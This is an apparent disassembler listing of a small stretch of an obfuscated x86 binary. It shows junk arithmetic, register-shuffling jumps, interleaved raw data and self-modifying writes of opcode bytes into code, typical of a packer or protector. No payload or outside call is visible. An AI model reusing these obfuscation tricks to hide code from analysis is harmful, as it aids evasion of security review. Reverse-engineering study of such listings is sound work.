; [00000001 BYTES: COLLAPSED FUNCTION nullsub_577. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_488BF9: ; CODE XREF: znnrn47v:00488710j
jmp locret_489EB8
; ---------------------------------------------------------------------------
align 10h
xchg ecx, [esp]
xchg edx, [esp]
mov ecx, edx
pop edx
push edx
push offset loc_488EFB
jmp locret_48CE95
; ---------------------------------------------------------------------------
dd 0EB1BC300h, 0A8CE9h ; CODE XREF: sub_48C14F-111j
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48930E
loc_488C1E: ; CODE XREF: sub_48930E:loc_488D47j
call sub_489582
; END OF FUNCTION CHUNK FOR sub_48930E
; ---------------------------------------------------------------------------
db 0
dd 95E99D00h, 0C600000Bh, 64590F01h, 30058Bh, 0C0810000h
dd 456A79C5h, 3BE8h, 8C0F0000h, 2FDFh
; ---------------------------------------------------------------------------
loc_488C48: ; CODE XREF: znnrn47v:loc_48BDA7j
add ebx, 19A09470h
and ebx, 0AEA497Eh
push eax
mov eax, offset loc_48ACBF
jmp loc_489998
; =============== S U B R O U T I N E =======================================
sub_488C5F proc near ; CODE XREF: znnrn47v:0048C92Cp
; FUNCTION CHUNK AT 0048B32F SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
lodsb
add edx, eax
rol edx, 3
loc_488C69: ; CODE XREF: znnrn47v:00489ECFj
xor edx, eax
dec ecx
jmp loc_48B32F
sub_488C5F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
mov byte ptr [ecx], 0C3h
pop ecx
push edi
jmp loc_48B2A1
; ---------------------------------------------------------------------------
dd 59240C87h, 32E1E8h, 0E9000000h, 2DDEh, 850F0000h, 0FFFFF0E9h
; CODE XREF: sub_48C14F+202j
dd 106FE8h, 0E9D13300h, 22FFh
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_488CA1: ; CODE XREF: sub_48B1BE+351j
jmp loc_48A90A
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
dw 8100h ; CODE XREF: znnrn47v:0048CB1Aj
; znnrn47v:0048CB27j
dd 23930CE1h, 0A0E981D6h, 810DC2B2h, 9C3A7FE1h, 0BAC1814Fh
dd 0E9FA2C74h, 331h, 6DE91889h, 0
; ---------------------------------------------------------------------------
xchg edi, [esp]
pop edi
mov byte ptr [ecx], 9Dh
pop ecx
or edi, 432B4292h
jns loc_48A3C0
loc_488CE0: ; CODE XREF: znnrn47v:0048BB5Aj
jmp loc_48B010
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
dd 30B4h, 4D21C7F7h, 25E90E3Ch, 5, 9D098B00h, 0FF240C87h
db 0D0h
; ---------------------------------------------------------------------------
loc_488D01: ; CODE XREF: znnrn47v:0048B483j
; znnrn47v:loc_48D0E4j
mov dword ptr [ebp-4], 1
push 95009CFCh
jmp loc_48B5D6
; =============== S U B R O U T I N E =======================================
sub_488D12 proc near ; CODE XREF: sub_48B9DB:loc_488F2Ep
; znnrn47v:0048BFB6j
; FUNCTION CHUNK AT 0048B4B1 SIZE 00000010 BYTES
xchg esi, [esp+0]
xchg ebp, [esp+0]
mov esi, ebp
pop ebp
push 3A9B9019h
pop edi
sub edi, 0A68A3C44h
jmp loc_48B4B1
sub_488D12 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 13EBC100h, 95E9F323h, 6
; =============== S U B R O U T I N E =======================================
sub_488D38 proc near ; CODE XREF: znnrn47v:loc_489FEEp
xchg ecx, [esp+0]
pop ecx
lea eax, nullsub_591
mov byte ptr [eax], 0C3h
retn
sub_488D38 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48930E
loc_488D47: ; CODE XREF: sub_48930E-CF5j
jmp loc_488C1E
; END OF FUNCTION CHUNK FOR sub_48930E
; ---------------------------------------------------------------------------
add esi, 0DDF8E5BDh
add esi, ebp
add esi, 0DEFB66DAh
mov [esi], eax
pop esi
push offset loc_48B89E
jmp locret_48BF9B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48D039
loc_488D67: ; CODE XREF: sub_48D039:loc_48CE96j
and esi, 0A4F6B9EEh
cmp esi, 0CEB39BF4h
jmp loc_48C9FB
; END OF FUNCTION CHUNK FOR sub_48D039
; ---------------------------------------------------------------------------
sub edi, 33FF49C5h
jmp loc_48A18C
; ---------------------------------------------------------------------------
align 4
dd 243C8700h, 3C2AF65Fh, 0D4850FA4h, 0E8000003h, 3C4h
dd 0F98BD5F7h, 41A9E9h, 1068C300h, 689C61E0h, 4894A0h
dd 0FFF11EE9h, 0C3FFh, 1132E9h, 0F000000h, 0B0085h, 7AE90000h
dd 1Dh
; ---------------------------------------------------------------------------
loc_488DC8: ; CODE XREF: znnrn47v:00488292j
jmp near ptr dword_4880FC+67h
; ---------------------------------------------------------------------------
align 2
add ebx, 0E15A8405h
xchg eax, [esi]
jmp loc_4898C0
; ---------------------------------------------------------------------------
jnz loc_48828C
shl edx, 0Eh
jmp loc_48A74C
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
; ---------------------------------------------------------------------------
sbb al, 24h
xchg edi, [esp]
mov ebx, edi
shl edi, 9
jmp loc_48B287
; ---------------------------------------------------------------------------
align 4
dd 24048700h, 8BBF5758h, 0E90048ADh, 0FFFFFA77h, 0CF8C0F00h
; CODE XREF: znnrn47v:0048C9F2p
dd 5BFFFFF0h, 48BB2C68h, 23DDE900h, 0
; ---------------------------------------------------------------------------
loc_488E20: ; DATA XREF: sub_48BACA-301Bo
mov [edi], eax
pop edi
call sub_48CD09
mov byte ptr [eax], 83h
xchg ecx, [esp]
mov eax, ecx
pop ecx
popf
cmp dword ptr [eax+10h], 0
jz locret_48C161
mov eax, 61h
jmp loc_48D046
; ---------------------------------------------------------------------------
dw 0C600h
dd 0E8588700h, 3AB0h, 5FC607C6h, 0A02A058Dh, 0C60048h
dd 62AE9C3h, 8B000000h, 241487D7h, 0BCDFC468h, 0C7C15FFCh
dd 40ABE912h, 0
; ---------------------------------------------------------------------------
loc_488E78: ; DATA XREF: sub_48C14F-23C8o
push 7EEAFAD5h
xchg ebx, [esp]
mov esi, ebx
pop ebx
add esi, 98F15149h
jmp loc_48C1A2
; ---------------------------------------------------------------------------
dw 0C300h
dd 3C870000h, 8B5F24h, 0E9240487h, 1643h, 2498860Fh, 8A0F0000h
dd 1A3h, 87DA8B53h, 8B51241Ch, 3C91E9CAh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_488EBA: ; CODE XREF: znnrn47v:004885BCj
jns loc_48B481
loc_488EC0: ; CODE XREF: znnrn47v:0048BD09p
xchg ebx, [esp]
pop ebx
call sub_4896A9
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_488ECB: ; CODE XREF: znnrn47v:loc_48CC87j
retn
; ---------------------------------------------------------------------------
db 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_571. PRESS KEYPAD "+" TO EXPAND]
db 0
; ---------------------------------------------------------------------------
loc_488ECF: ; DATA XREF: znnrn47v:0048830Bo
push 20596718h
pop edi
add edi, 3B047F38h
and edi, 8870489Ch
jmp loc_48C044
; ---------------------------------------------------------------------------
dw 5F00h
; ---------------------------------------------------------------------------
rol edi, 15h
add edi, 0E660F3CCh
test edx, edi
pop edi
jmp loc_48A4B9
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_488EFB: ; DATA XREF: znnrn47v:00488C0Ao
push 0ACC4ED19h
pop edx
or edx, 2606B743h
sub edx, 0CDC0720Ch
add edx, 1F4201CEh
xchg edx, [esp]
jmp loc_48975A
; ---------------------------------------------------------------------------
align 4
dd 0B15CB800h
db 45h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_487DC2
loc_488F22: ; CODE XREF: sub_487DC2:loc_48C468j
push offset byte_48C7B5
jmp loc_48A864
; END OF FUNCTION CHUNK FOR sub_487DC2
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B9DB
loc_488F2E: ; CODE XREF: sub_48B9DB:loc_48AE34j
call sub_488D12
add [eax-58h], ch ; CODE XREF: znnrn47v:loc_48C76Ej
call far ptr 0Fh:9EE90048h
; END OF FUNCTION CHUNK FOR sub_48B9DB
; ---------------------------------------------------------------------------
db 3 dup(0)
; ---------------------------------------------------------------------------
xor eax, edx
and edx, 0BCA440E4h
jmp loc_4883B1
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_488F4E: ; CODE XREF: znnrn47v:0048A91Bj
push eax
push 2D27C9EBh
pop eax
xor eax, 4468E72Dh
jnz loc_48A2F8
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
db 2 dup(0), 0C1h
dd 0CD2B15E5h, 329FE9h
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_596. PRESS KEYPAD "+" TO EXPAND]
align 10h
dd 2198E900h, 0E9000000h, 16ECh, 588700C6h, 0F710C7C1h
dd 0C7h, 3DDBE904h, 0
; =============== S U B R O U T I N E =======================================
sub_488F90 proc near ; CODE XREF: znnrn47v:00487FE8p
push offset byte_48B3D3
jmp nullsub_571
sub_488F90 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_488F9C proc near ; CODE XREF: znnrn47v:00488FDAp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004892FC SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048ABD4 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add ebx, 0FF4705ABh
xchg ebx, [esp-4+arg_0]
jmp loc_48ABD4
sub_488F9C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dw 6800h
dd offset dword_488674
; ---------------------------------------------------------------------------
jmp locret_488A94
; ---------------------------------------------------------------------------
align 2
not edi
; =============== S U B R O U T I N E =======================================
sub_488FBC proc near ; CODE XREF: znnrn47v:004887C9p
; FUNCTION CHUNK AT 0048CDED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CE71 SIZE 00000022 BYTES
xchg ebx, [esp+0]
pop ebx
push 0CC0833E2h
pop eax
rol eax, 1
jmp loc_48CE71
sub_488FBC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 2
loc_488FCE: ; CODE XREF: znnrn47v:0048A9CAj
add ebx, 21A06D92h
and ebx, 141EA8Fh
call sub_488F9C
loc_488FDF: ; CODE XREF: znnrn47v:00489F54j
jmp locret_48CF87
; ---------------------------------------------------------------------------
dd 87EB8B00h, 0DD8B242Ch, 0C35Dh, 48D25Fh, 580E900h, 68000000h
; CODE XREF: znnrn47v:0048C90Dj
dd 48B066h, 3A60E9h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_489006: ; CODE XREF: znnrn47v:004889E0j
push 0C46F9E2Eh
xchg eax, [esp]
pop eax
mov byte ptr [esi], 90h
pop esi
call nullsub_589
nop
jmp loc_48994C
; ---------------------------------------------------------------------------
dw 0E900h
dd 0FFFFF2ECh, 8B53C300h, 241C87D8h, 48B06CB8h, 31ACE900h
dd 0F000000h, 0FFED9184h, 0C28B50FFh, 0E9240487h, 1780h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489C50
loc_489049: ; CODE XREF: sub_489C50+5j
jmp near ptr dword_487ACC+145h
; END OF FUNCTION CHUNK FOR sub_489C50
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_48904F: ; CODE XREF: znnrn47v:00489B37j
jmp loc_489A7F
; ---------------------------------------------------------------------------
dd 0C1590000h, 0C98108C1h, 190F3000h, 0C1CDC181h, 68E90498h
; CODE XREF: znnrn47v:0048B12Ej
dd 2Bh
db 0
; ---------------------------------------------------------------------------
loc_48906D: ; CODE XREF: znnrn47v:00487FC0j
push ecx
push 0FB43C3B5h
pop ecx
or ecx, 8C9EC2FAh
rol ecx, 18h
xor ecx, 48380521h
add ecx, ebp
add ecx, 4838252Eh
jmp loc_48CB7B
; ---------------------------------------------------------------------------
dd 0D2F70000h, 56E91089h, 5E00002Ah, 770AE881h, 0F0817F2Dh
dd 2931CCE9h, 0E3DEC881h, 0E0811353h, 0A362B225h, 2BC1E8h
dd 0E9000000h, 0FFFFEC3Ch, 3399E9h
db 3 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_587. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_4890C8: ; CODE XREF: sub_488955+16j
jmp loc_48AF71
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
loc_4890CF: ; CODE XREF: znnrn47v:00487AB9j
jmp loc_489B9E
; ---------------------------------------------------------------------------
mov ecx, 8387898h
jmp loc_489580
; ---------------------------------------------------------------------------
dw 8700h
; ---------------------------------------------------------------------------
adc al, 24h
push 0E8FE61A9h
pop edi
xor edi, 0D30517h
and edi, 0FABC93DAh
jmp loc_48C249
; ---------------------------------------------------------------------------
align 2
jnz loc_48A8CC
add [ebx], ch
jmp short loc_489127
; ---------------------------------------------------------------------------
dd 1AE8C1D0h, 251D8B0Fh, 0B4E90000h, 0F000017h, 10DC8Ch
dd 0F9810000h, 0E3884236h, 207AE9h
db 2 dup(0), 85h
; ---------------------------------------------------------------------------
loc_489127: ; CODE XREF: znnrn47v:00489102j
cmc
jmp loc_48C445
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 0FFEAA982h
db 0FFh
; =============== S U B R O U T I N E =======================================
sub_489135 proc near ; CODE XREF: znnrn47v:0048A196p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0048883B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0048899C SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004894EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489A94 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00489DA9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048A218 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0048A227 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048A6D7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A8A8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0048ADDC SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048C0A0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048C414 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 0048C5EC SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048C9B7 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0048CC40 SIZE 00000023 BYTES
xchg eax, [esp+0]
xchg edi, [esp+0]
mov eax, edi
jmp loc_4894EF
sub_489135 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
loc_489144: ; CODE XREF: znnrn47v:0048BF95j
mov byte ptr [edi], 87h
pop edi
xchg ebx, [esp]
mov ecx, ebx
xchg ecx, [esp]
jmp loc_48B30A
; ---------------------------------------------------------------------------
align 2
jz loc_48C909
xchg eax, [esp]
pop eax
jmp loc_48A5CD
; ---------------------------------------------------------------------------
db 2 dup(0), 68h
dd offset loc_489909
; ---------------------------------------------------------------------------
jmp locret_489900
; ---------------------------------------------------------------------------
db 87h, 1Ch, 24h
dd 815BF38Bh, 4FD480EEh, 0C9850F33h, 15h, 0CC796800h, 4CE9AD61h
dd 0FFFFFCh, 0FED7850Fh, 1DE9FFFFh, 68FFFFEEh, 48B277h
dd 70EE9h, 2C60000h, 51595A89h
db 5Ah
byte_4891AD db 0, 14h, 24h ; DATA XREF: sub_48A71A:loc_488904o
dd 0FFE8E2E8h, 0FAE6E9FFh, 0FFFFh
; ---------------------------------------------------------------------------
loc_4891BC: ; CODE XREF: znnrn47v:loc_48B5D6j
pop eax
call sub_489CDA
add [ecx-7796A717h], al
mov ebp, eax
jo short near ptr byte_4891F8
; ---------------------------------------------------------------------------
dd 0C9E90000h, 0FFFFF7h ; CODE XREF: znnrn47v:0048AC39j
; ---------------------------------------------------------------------------
loc_4891D4: ; CODE XREF: znnrn47v:0048979Bj
jmp locret_48A5ED
; ---------------------------------------------------------------------------
db 5Bh, 23h, 0C3h
; ---------------------------------------------------------------------------
loc_4891DC: ; CODE XREF: znnrn47v:0048CCFCj
call near ptr dword_48892C+1Ah
; ---------------------------------------------------------------------------
db 2 dup(0), 57h
db 68h ; h
db 88h ; ˆ
db 51h ; Q
db 0CBh ; Ë
db 0C2h ; Â
db 5Fh ; _
db 81h ;
db 0F7h ; ÷
db 0B9h ; ¹
db 34h ; 4
db 0BDh ; ½
db 74h ; t
db 50h ; P
db 0E9h ; é
db 0F4h ; ô
db 17h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_4891F6: ; CODE XREF: znnrn47v:0048BD9Aj
retn
; ---------------------------------------------------------------------------
align 4
byte_4891F8 db 0 ; CODE XREF: znnrn47v:004891CAj
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_4891F9: ; CODE XREF: znnrn47v:loc_48977Aj
; sub_488955:loc_48AEE1j
jmp near ptr dword_487ACC+65h
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
dw 8500h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
jmp loc_48BAA2
; ---------------------------------------------------------------------------
loc_489206: ; CODE XREF: znnrn47v:0048BCACj
jnz loc_48984F
; =============== S U B R O U T I N E =======================================
sub_48920C proc near ; CODE XREF: sub_48B91B+Ap
; FUNCTION CHUNK AT 00488BCC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048AFB1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CA1E SIZE 00000005 BYTES
xchg edi, [esp+0]
xchg edx, [esp+0]
mov edi, edx
pop edx
jmp loc_48CA1E
sub_48920C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
js loc_48D232
not ecx
jmp loc_48BC95
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_48922B: ; CODE XREF: znnrn47v:0048AE95j
jnz near ptr dword_48872C+0Ch
jmp loc_48B160
; ---------------------------------------------------------------------------
dw 8700h
; ---------------------------------------------------------------------------
xor al, 24h
push 488DA2h
jmp loc_48AB0C
; ---------------------------------------------------------------------------
locret_489244: ; CODE XREF: znnrn47v:loc_4883ACj
retn
; ---------------------------------------------------------------------------
db 2 dup(0), 0E9h
; ---------------------------------------------------------------------------
retf
; ---------------------------------------------------------------------------
db 1Bh, 2 dup(0)
dd 0DA870000h, 1527E9h, 0F000000h, 0FFF5E684h, 0C4D268FFh
dd 0BAE90048h, 2Dh, 0F16800C3h, 5BE0781Dh, 204FEB81h, 0C38104B7h
dd 2487A8B3h, 48A64D68h, 0FDC2E900h, 0FFFFh, 760EEB81h
dd 3C87159Ch, 840F5F24h, 0FFFFF1B8h, 3E5E8h, 2E90E900h
dd 68000000h, 48CDA6h, 1097E9h, 0C870000h, 68D98B24h, 48A0FAh
dd 18B7E9h, 2E96E800h, 87000000h, 565B241Ch, 48B87968h
dd 2144E900h, 0C1000000h, 308B05CDh, 3C8DE9h, 0CE8D0F00h
dd 0E9FFFFF3h, 0FFFFF4D6h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48B1BE
loc_4892EA: ; CODE XREF: sub_48B1BE:loc_48BF7Bj
; znnrn47v:0048BF88j
mov eax, [eax]
or eax, eax
jnz locret_4892F9
jmp loc_48CBEB
; ---------------------------------------------------------------------------
locret_4892F9: ; CODE XREF: sub_48B1BE-1ED0j
retn
; END OF FUNCTION CHUNK FOR sub_48B1BE
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_488F9C
loc_4892FC: ; CODE XREF: sub_488F9C:loc_48ABD4j
; znnrn47v:0048CBF8j
call sub_48A0DE
add [edi], cl
test [edi-18h], ebx
; END OF FUNCTION CHUNK FOR sub_488F9C
; ---------------------------------------------------------------------------
dw 0FFFFh
; ---------------------------------------------------------------------------
jmp loc_48B768
; ---------------------------------------------------------------------------
align 2
; =============== S U B R O U T I N E =======================================
sub_48930E proc near ; CODE XREF: znnrn47v:0048825Ep
; znnrn47v:0048CE6Bj
; FUNCTION CHUNK AT 004885FD SIZE 00000021 BYTES
; FUNCTION CHUNK AT 00488C1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00488D47 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489C8D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0048BAEC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048D082 SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
push esi
push 0DFA5E952h
pop esi
or esi, 0FC2F7E2Ah
xor esi, 43E0828Fh
loc_489325: ; CODE XREF: znnrn47v:0048C0ACj
or esi, 6FB65379h
jmp loc_48D082
sub_48930E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dd 54E78100h, 81DB9A33h, 0CD1389C7h, 0CC7C1D5h, 0E0F2F781h
dd 0C781F066h, 2AD882C4h, 0E95FD703h, 1445h, 0F21B0000h
dd 5B241C87h, 101C7h, 58D0001h, 488ABCh, 0D78B5256h, 0FFFD6EE9h
dd 243487FFh, 0E2313068h, 0C08158CEh, 3942EA51h, 0B815C881h
dd 65E93F5Dh, 2Ah
db 0
byte_48938D db 0C6h, 0, 3 ; DATA XREF: znnrn47v:loc_48879Ao
dd 0C7C78158h, 3791B03h, 56C781FDh, 0E9427734h, 0FFFFEBBFh
dd 0F5B4860Fh, 0FD81FFFFh, 27E47796h, 0FFF3A4E9h, 870000FFh
dd 6459240Ch, 30058Bh, 36680000h, 0E9004882h, 0FFFFEE69h
; =============== S U B R O U T I N E =======================================
sub_4893CC proc near ; CODE XREF: sub_48C14F:loc_48B328p
; FUNCTION CHUNK AT 0048B305 SIZE 00000005 BYTES
xchg eax, [esp+0]
xchg ebx, [esp+0]
mov eax, ebx
pop ebx
mov byte ptr [edi], 87h
jmp loc_48B305
sub_4893CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4893DD proc near ; CODE XREF: znnrn47v:0048A3C7p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0048884F SIZE 00000005 BYTES
xchg ecx, [esp+0]
xchg edi, [esp+0]
mov ecx, edi
pop edi
xchg edi, [esp-4+arg_0]
jmp loc_48884F
sub_4893DD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
dd 0FFF9F6E8h, 0E90000FFh, 0FFFFEAF9h
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488955
loc_4893FF: ; CODE XREF: sub_488955+257Aj
jmp loc_48A3FF
; END OF FUNCTION CHUNK FOR sub_488955
; ---------------------------------------------------------------------------
dd 8D0F0000h, 4EEh, 294FE9h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48A5BC
loc_489413: ; CODE XREF: znnrn47v:00489455j
; sub_48A5BC:loc_48C774j
xor eax, 935FF171h
or eax, 9543488Ah
add eax, 680C0494h
push eax
call near ptr dword_487CA0+0A8h
; END OF FUNCTION CHUNK FOR sub_48A5BC
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_48942C proc near ; CODE XREF: sub_48C14F-1CB0p
; FUNCTION CHUNK AT 004885D5 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push 0CB590462h
pop eax
push offset byte_489A69
jmp loc_4885D5
sub_48942C endp
; ---------------------------------------------------------------------------
dd 77D38100h, 0E99F68C3h, 1CE7h
; ---------------------------------------------------------------------------
loc_48944C: ; CODE XREF: znnrn47v:00488222j
xchg eax, [esp]
call ds:dword_45B0C0 ; ExitProcess
jmp loc_489413
; ---------------------------------------------------------------------------
align 4
xchg edx, [esp]
push eax
mov eax, ebx
xchg eax, [esp]
mov ebx, offset loc_48CE08
jmp loc_48AFD7
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
dd 0FC25E900h, 16E9FFFFh, 17h
db 0
byte_48947D db 89h, 7, 5Fh ; DATA XREF: sub_488549:loc_48BE2Eo
dd 35E8E8h, 0E8000000h, 2FBFh, 0FFE639E9h, 0BCE900FFh
dd 8B000001h, 0E9C523C1h, 0A19h, 8B241487h, 0F0815AC2h
dd 19D81D05h, 0FFFD96E9h, 9C0000FFh, 3308E9h, 64000000h
dd 58Fh, 5AE80000h, 10h, 0F76E900h, 0
; ---------------------------------------------------------------------------
sbb edi, ecx
jmp loc_489937
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_4894D8: ; CODE XREF: sub_48C14F+508j
jmp nullsub_584
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
loc_4894DD: ; CODE XREF: znnrn47v:0048A98Cj
jmp locret_48C726
; ---------------------------------------------------------------------------
dw 0E900h
dd 0FFFFE806h, 2845E9C3h ; CODE XREF: znnrn47v:loc_48BD10j
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489135
loc_4894EF: ; CODE XREF: sub_489135+8j
jmp loc_48883B
; END OF FUNCTION CHUNK FOR sub_489135
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_488549
loc_4894F5: ; CODE XREF: sub_488549+44Cj
jmp loc_48AA69
; END OF FUNCTION CHUNK FOR sub_488549
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_48B52C
loc_4894FC: ; CODE XREF: sub_48B52C+Fj
push offset dword_48C630
jmp nullsub_582
; END OF FUNCTION CHUNK FOR sub_48B52C
; ---------------------------------------------------------------------------
loc_489506: ; DATA XREF: znnrn47v:00487FD8o
add eax, 0FB7F7752h
loc_48950C: ; DATA XREF: znnrn47v:00488B7Eo
add eax, 1000h
push ebx
mov ebx, edi
xchg ebx, [esp]
push eax
loc_489518: ; CODE XREF: znnrn47v:004888F8j
pop edi
xchg edi, [esp]
jmp near ptr dword_487FFC+6
; ---------------------------------------------------------------------------
align 2
jl loc_48C9EC
add [edi-75h], dl
cli
jmp loc_48C9E6
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_48C14F
loc_489532: ; CODE XREF: sub_48C14F:loc_48A8DAj
jnz loc_48AD66
add cl, ch
pop eax
and [eax], al
add [edi-1610D410h], al
sbb [eax], ebx
; END OF FUNCTION CHUNK FOR sub_48C14F
; ---------------------------------------------------------------------------
db 3 dup(0)
db 0, 0C3h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48BD79
loc_48954A: ; CODE XREF: sub_48BD79-CB4j
jmp loc_488228
; END OF FUNCTION CHUNK FOR sub_48BD79
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_489582
loc_48954F: ; CODE XREF: sub_489582+Aj
; znnrn47v:loc_48D053j
add cl, ch
or al, 14h
; END OF FUNCTION CHUNK FOR sub_489582
; ---------------------------------------------------------------------------
db 0
dword_489554 dd 0E9000000h, 0EC0h ; CODE XREF: znnrn47v:0048853Ej
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4896A9
loc_48955D: ; CODE XREF: sub_4896A9+Ej
xchg edi, [esp+0]
mov ecx, edi
pop edi
sub eax, 7F2D770Ah
jmp loc_48A823
; END OF FUNCTION CHUNK FOR sub_4896A9
; ---------------------------------------------------------------------------
dw 5000h
; ---------------------------------------------------------------------------
rol ecx, 6
jmp sub_48B5EC
; ---------------------------------------------------------------------------
dd 0DCE80000h, 6
; ---------------------------------------------------------------------------
loc_489580: ; CODE XREF: znnrn47v:004890D9j
or edx, ecx
; =============== S U B R O U T I N E =======================================
sub_489582 proc near ; CODE XREF: sub_48930E:loc_488C1Ep
; FUNCTION CHUNK AT 0048954F SIZE 00000004 BYTES
; FUNCTION CHUNK AT 004895BF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00489FB2 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0048A347 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048B10E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048CA41 SIZE 00000012 BYTES
xchg eax, [esp+0]
pop eax
add ecx, 40385044h
jecxz short loc_48954F
jmp loc_4895BF
sub_489582 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
locret_489593: ; CODE XREF: znnrn47v:00489A53j
retn
; ---------------------------------------------------------------------------
loc_489594: ; CODE XREF: znnrn47v:0048C144j
jmp locret_48BFB4
; ---------------------------------------------------------------------------
align 2
retn
; ---------------------------------------------------------------------------
db 0E9h
dd 0FFFFF529h
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_576. PRESS KEYPAD "+" TO EXPAND]
align 4
dd 967BF281h, 0D5032A6Ch, 1EBFE8h
db 3 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_48C11B
loc_4895B3: ; CODE XREF: sub_48C11B-AC4j
jmp loc_48BA83
; END OF FUNCTION CHUNK FOR sub_48C11B
